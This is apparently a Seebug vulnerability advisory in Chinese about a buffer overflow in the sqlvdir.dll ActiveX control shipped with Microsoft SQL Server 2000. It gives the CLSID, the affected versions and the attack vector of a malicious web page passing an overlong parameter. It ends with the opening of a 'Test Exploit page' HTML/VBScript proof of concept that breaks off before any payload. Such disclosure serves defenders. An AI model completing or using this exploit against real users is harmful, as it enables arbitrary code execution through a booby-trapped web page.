Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞

2008-09-14T00:00:00
ID SSV:4036
Type seebug
Reporter Root
Modified 2008-09-14T00:00:00

Description

BUGTRAQ ID: 31129

Microsoft SQL Server是一款流行的SQL数据库系统。

SQL Server所安装的sqlvdir.dll ActiveX控件(默认路径为C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll,clsid:FC13BAA2-9C1A-4069-A221-31A147636038)所暴露的ISQLVDirControl接口没有正确的验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意代码。

Microsoft SQL Server 2000 SP4 Microsoft SQL Server 2000 SP3a Microsoft SQL Server 2000 SP3 Microsoft SQL Server 2000 SP2 Microsoft SQL Server 2000 SP1 Microsoft SQL Server 2000 Microsoft


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.microsoft.com/technet/security/ target=_blank>http://www.microsoft.com/technet/security/</a>

                                        
                                            
                                                &lt;html&gt; 
Test Exploit page 
&lt;object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' &gt;&lt;/object&gt; 
&lt;script language='vbscript'&gt; 
targetFile = &quot;C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.d